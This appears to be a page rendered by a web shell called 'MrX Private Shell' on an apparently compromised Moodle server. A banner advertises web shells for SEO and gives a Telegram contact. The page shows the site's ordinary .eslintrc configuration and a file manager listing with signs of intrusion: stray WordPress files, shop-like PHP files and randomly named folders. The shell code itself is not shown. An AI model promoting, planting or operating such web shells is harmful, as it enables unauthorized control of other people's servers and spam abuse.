__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{
'plugins': [
'@babel',
'promise',
'jsdoc'
],
'extends': [
'eslint:recommended',
'plugin:promise/recommended'
],
'env': {
'browser': true,
// Enable ES6+ features by default.
// See http://eslint.org/docs/user-guide/configuring#specifying-environments
// Note: The YUI override must exactly match this when disabling the ES6+ version because those features are not supported by Shifter.
'es2020': true,
'amd': true
},
'globals': {
'M': true,
'Y': true
},
// Warn about unused eslint-disable statements.
'reportUnusedDisableDirectives': true,
'rules': {
// See http://eslint.org/docs/rules/ for all rules and explanations of all
// rules.
// === Possible Errors ===
'comma-dangle': 'off',
'no-console': 'error',
'no-empty': 'warn',
'no-extra-parens': 'off',
'no-prototype-builtins': 'off',
'no-unreachable': 'warn',
// === Best Practices ===
// (these mostly match our jshint config)
'array-callback-return': 'warn',
'block-scoped-var': 'warn',
'complexity': 'warn',
'consistent-return': 'warn',
'curly': 'error',
'dot-notation': 'warn',
'no-alert': 'warn',
'no-caller': 'error',
'no-div-regex': 'error',
'no-empty-function': 'warn',
'no-eq-null': 'error',
'no-eval': 'error',
'no-extend-native': 'error',
'no-extra-bind': 'warn',
'no-floating-decimal': 'warn',
'no-global-assign': 'warn',
'no-implied-eval': 'error',
'no-invalid-this': 'error',
'no-iterator': 'error',
'no-labels': 'error',
'no-loop-func': 'error',
'no-multi-spaces': 'warn',
'no-multi-str': 'error',
'no-new-func': 'error',
'no-new-wrappers': 'error',
'no-octal-escape': 'error',
'no-proto': 'error',
'no-redeclare': 'warn',
'no-restricted-globals': ['error', { 'name': 'Notification' }],
'no-return-assign': 'error',
'no-script-url': 'error',
'no-self-compare': 'error',
'no-sequences': 'warn',
'no-throw-literal': 'warn',
'no-unmodified-loop-condition': 'error',
'no-unused-expressions': 'error',
'no-useless-call': 'warn',
'no-useless-escape': 'warn',
'wrap-iife': ['error', 'any'],
// === Variables ===
'no-undef-init': 'error',
'no-unused-vars': ['error', { 'caughtErrors': 'none' }],
// === Stylistic Issues ===
'array-bracket-spacing': 'warn',
'block-spacing': 'warn',
'brace-style': ['warn', '1tbs'],
'camelcase': 'warn',
'capitalized-comments': ['warn', 'always', { 'ignoreConsecutiveComments': true }],
'comma-spacing': ['warn', { 'before': false, 'after': true }],
'comma-style': ['warn', 'last'],
'computed-property-spacing': 'error',
'consistent-this': 'off',
'eol-last': 'off',
'func-call-spacing': ['warn', 'never'],
'func-names': 'off',
'func-style': 'off',
// indent currently not doing well with our wrapping style, so disabled.
'indent': ['off', 4, { 'SwitchCase': 1 }],
'key-spacing': ['warn', { 'beforeColon': false, 'afterColon': true, 'mode': minimum }],
'keyword-spacing': 'warn',
'linebreak-style': ['error', 'unix'],
'lines-around-comment': 'off',
'max-len': ['error', 132],
'max-lines': 'off',
'max-depth': 'warn',
'max-nested-callbacks': ['warn', 5],
'max-params': 'off',
'max-statements': 'off',
'max-statements-per-line': ['warn', { max: 2 }],
'new-cap': ['warn', { 'properties': false }],
'new-parens': 'warn',
'newline-per-chained-call': 'off',
'no-array-constructor': 'off',
'no-bitwise': 'error',
'no-continue': 'off',
'no-inline-comments': 'off',
'no-lonely-if': 'off',
'no-mixed-operators': 'off',
'no-multiple-empty-lines': 'warn',
'no-negated-condition': 'off',
'no-nested-ternary': 'warn',
'no-new-object': 'off',
'no-plusplus': 'off',
'no-tabs': 'error',
'no-ternary': 'off',
'no-trailing-spaces': 'error',
'no-underscore-dangle': 'off',
'no-unneeded-ternary': 'off',
'no-whitespace-before-property': 'warn',
'object-curly-newline': 'off',
'object-curly-spacing': 'warn',
'object-property-newline': 'off',
'one-var': 'off',
'one-var-declaration-per-line': ['warn', 'initializations'],
'operator-assignment': 'off',
'operator-linebreak': 'off',
'padded-blocks': 'off',
'quote-props': ['warn', 'as-needed', {'unnecessary': false, 'keywords': true, 'numbers': true}],
'quotes': 'off',
'semi': 'error',
'semi-spacing': ['warn', {'before': false, 'after': true}],
'sort-vars': 'off',
'space-before-blocks': 'warn',
'space-before-function-paren': ['warn', 'never'],
'space-in-parens': 'warn',
'space-infix-ops': 'warn',
'space-unary-ops': 'warn',
'spaced-comment': 'warn',
'unicode-bom': 'error',
'wrap-regex': 'off',
// === Promises (override plugin:promise/recommended) ===
'promise/always-return': 'warn',
'promise/no-return-wrap': 'warn',
'promise/param-names': 'warn',
'promise/catch-or-return': ['warn', {terminationMethod: ['catch', 'fail', 'always'], allowFinally: true}],
'promise/no-native': 'warn',
'promise/avoid-new': 'warn',
// === Deprecations ===
"no-restricted-properties": ['warn', {
'object': 'M',
'property': 'str',
'message': 'Use "core/str" module or M.util.get_string()'
}],
},
overrides: [
{
files: ["**/yui/src/**/*.js"],
'env': {
// Disable ES6+ for YUI files.
'es2020': false,
},
// Disable some rules which we can't safely define for YUI rollups.
rules: {
'no-undef': 'off',
'no-unused-vars': 'off',
'no-unused-expressions': 'off',
// === JSDocs ===
"jsdoc/check-access": 'off',
"jsdoc/check-alignment": 'off',
"jsdoc/check-param-names": 'off',
"jsdoc/check-property-names": 'off',
"jsdoc/empty-tags": 'off',
"jsdoc/implements-on-classes": 'off',
"jsdoc/multiline-blocks": 'off',
"jsdoc/require-jsdoc": 'off',
"jsdoc/require-param": 'off',
"jsdoc/require-param-name": 'off',
"jsdoc/require-param-type": 'off',
"jsdoc/require-property": 'off',
"jsdoc/require-property-name": 'off',
"jsdoc/require-property-type": 'off',
}
},
{
files: ["**/amd/src/*.js", "**/amd/src/**/*.js", "Gruntfile.js", ".grunt/*.js", ".grunt/tasks/*.js", "jsdoc.conf.js"],
// We're using babel transpiling so use their parser
// for linting.
parser: '@babel/eslint-parser',
// Check AMD with some slightly stricter rules.
rules: {
'no-implicit-globals': 'error',
// Disable all of the rules that have babel versions.
'new-cap': 'off',
// Not using this rule for the time being because it isn't
// compatible with jQuery and ES6.
'no-invalid-this': 'off',
'object-curly-spacing': 'off',
'quotes': 'off',
'semi': 'off',
'no-unused-expressions': 'off',
// Enable all of the babel version of these rules.
'@babel/new-cap': ['warn', { 'properties': false }],
// Not using this rule for the time being because it isn't
// compatible with jQuery and ES6.
'@babel/no-invalid-this': 'off',
'@babel/object-curly-spacing': 'warn',
'@babel/semi': 'error',
'@babel/no-unused-expressions': 'error',
// === Promises ===
// We have Promise now that we're using ES6.
'promise/no-native': 'off',
'promise/avoid-new': 'off',
// === JSDocs ===
'jsdoc/check-access': 'error',
'jsdoc/check-alignment': 1, // Recommended.
'jsdoc/check-param-names': 'error',
'jsdoc/check-property-names': 'error',
'jsdoc/empty-tags': 'error',
'jsdoc/implements-on-classes': 'error',
'jsdoc/multiline-blocks': 'error',
'jsdoc/require-jsdoc': 'error',
'jsdoc/require-param': 'error',
'jsdoc/require-param-name': 'error',
'jsdoc/require-param-type': 'error',
'jsdoc/require-property': 'error',
'jsdoc/require-property-name': 'error',
'jsdoc/require-property-type': 'error'
},
parserOptions: {
'sourceType': 'module',
'requireConfigFile': false
}
}
]
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .github | Folder | 0755 |
|
|
| .grunt | Folder | 0755 |
|
|
| .phpstorm.meta.php | Folder | 0755 |
|
|
| .trash7206 | Folder | 0755 |
|
|
| .upgradenotes | Folder | 0755 |
|
|
| 634867 | Folder | 0755 |
|
|
| 9865a | Folder | 0555 |
|
|
| admin | Folder | 0755 |
|
|
| ai | Folder | 0755 |
|
|
| analytics | Folder | 0755 |
|
|
| auth | Folder | 0755 |
|
|
| availability | Folder | 0755 |
|
|
| backup | Folder | 0755 |
|
|
| badges | Folder | 0755 |
|
|
| blocks | Folder | 0755 |
|
|
| blog | Folder | 0755 |
|
|
| cache | Folder | 0755 |
|
|
| calendar | Folder | 0755 |
|
|
| cohort | Folder | 0755 |
|
|
| comment | Folder | 0755 |
|
|
| communication | Folder | 0755 |
|
|
| competency | Folder | 0755 |
|
|
| completion | Folder | 0755 |
|
|
| contentbank | Folder | 0755 |
|
|
| course | Folder | 0755 |
|
|
| customfield | Folder | 0755 |
|
|
| dataformat | Folder | 0755 |
|
|
| enrol | Folder | 0755 |
|
|
| error | Folder | 0755 |
|
|
| favourites | Folder | 0755 |
|
|
| files | Folder | 0755 |
|
|
| filter | Folder | 0755 |
|
|
| grade | Folder | 0755 |
|
|
| group | Folder | 0755 |
|
|
| h5p | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| install | Folder | 0755 |
|
|
| iplookup | Folder | 0755 |
|
|
| lang | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| local | Folder | 0755 |
|
|
| login | Folder | 0755 |
|
|
| media | Folder | 0755 |
|
|
| message | Folder | 0755 |
|
|
| mnet | Folder | 0755 |
|
|
| mod | Folder | 0755 |
|
|
| moodlenet | Folder | 0755 |
|
|
| mp4 | Folder | 0755 |
|
|
| my | Folder | 0755 |
|
|
| notes | Folder | 0755 |
|
|
| payment | Folder | 0755 |
|
|
| pix | Folder | 0755 |
|
|
| plagiarism | Folder | 0755 |
|
|
| portfolio | Folder | 0755 |
|
|
| privacy | Folder | 0755 |
|
|
| question | Folder | 0755 |
|
|
| rating | Folder | 0755 |
|
|
| report | Folder | 0755 |
|
|
| reportbuilder | Folder | 0755 |
|
|
| repository | Folder | 0755 |
|
|
| rss | Folder | 0755 |
|
|
| search | Folder | 0755 |
|
|
| sms | Folder | 0755 |
|
|
| tag | Folder | 0755 |
|
|
| theme | Folder | 0755 |
|
|
| user | Folder | 0755 |
|
|
| userpix | Folder | 0755 |
|
|
| vKbrBHixfuYwEeP | Folder | 0755 |
|
|
| webalizer | Folder | 0755 |
|
|
| webservice | Folder | 0755 |
|
|
| wp-content | Folder | 0755 |
|
|
| wp-includes | Folder | 0755 |
|
|
| .eslintrc | File | 8.23 KB | 0644 |
|
| .gherkin-lintrc | File | 597 B | 0644 |
|
| .gitattributes | File | 142 B | 0644 |
|
| .htaccess | File | 1.13 KB | 0555 |
|
| .jshintignore | File | 16 B | 0644 |
|
| .jshintrc | File | 1.51 KB | 0644 |
|
| .nvmrc | File | 8 B | 0644 |
|
| .shifter.json | File | 67 B | 0644 |
|
| .stylelintrc | File | 4.82 KB | 0644 |
|
| CONTRIBUTING.md | File | 2.59 KB | 0644 |
|
| COPYING.txt | File | 34.32 KB | 0644 |
|
| Gruntfile.js | File | 9.44 KB | 0644 |
|
| INSTALL.txt | File | 664 B | 0644 |
|
| README.md | File | 1.85 KB | 0644 |
|
| TRADEMARK.txt | File | 3.29 KB | 0644 |
|
| UPGRADING.md | File | 70.63 KB | 0644 |
|
| behat.yml.dist | File | 311 B | 0644 |
|
| brokenfile.php | File | 1.13 KB | 0644 |
|
| buy.php | File | 1.46 KB | 0444 |
|
| composer.json | File | 2.04 KB | 0644 |
|
| composer.lock | File | 164.29 KB | 0644 |
|
| config-dist.php | File | 67.04 KB | 0644 |
|
| config.php | File | 616 B | 0644 |
|
| defaults.php | File | 1.93 KB | 0444 |
|
| draftfile.php | File | 2.61 KB | 0644 |
|
| editmode.php | File | 1.35 KB | 0644 |
|
| file.php | File | 3.83 KB | 0644 |
|
| githash.php | File | 953 B | 0644 |
|
| goods.php | File | 1.45 KB | 0444 |
|
| help.php | File | 1.83 KB | 0644 |
|
| help_ajax.php | File | 1.39 KB | 0644 |
|
| index.php | File | 17.66 KB | 0555 |
|
| index.php0 | File | 17.66 KB | 0755 |
|
| install.php | File | 25.24 KB | 0644 |
|
| networks.php | File | 1.93 KB | 0444 |
|
| npm-shrinkwrap.json | File | 473.4 KB | 0644 |
|
| options.php | File | 1.29 KB | 0444 |
|
| package.json | File | 1.78 KB | 0644 |
|
| phpcs.xml.dist | File | 145 B | 0644 |
|
| phpunit.xml.dist | File | 15.63 KB | 0644 |
|
| pluginfile.php | File | 1.64 KB | 0644 |
|
| plugins.php | File | 1.72 KB | 0444 |
|
| product.php | File | 1.93 KB | 0444 |
|
| r.php | File | 2.96 KB | 0644 |
|
| report.html | File | 638.38 KB | 0644 |
|
| robots.txt | File | 412 B | 0444 |
|
| security.txt | File | 670 B | 0644 |
|
| tokenpluginfile.php | File | 1.63 KB | 0644 |
|
| version.php | File | 1.6 KB | 0644 |
|
| wp-blog-header.php | File | 2.73 KB | 0644 |
|
| wp-cron.php | File | 2.73 KB | 0644 |
|
| wp-load.php | File | 0 B | 0644 |
|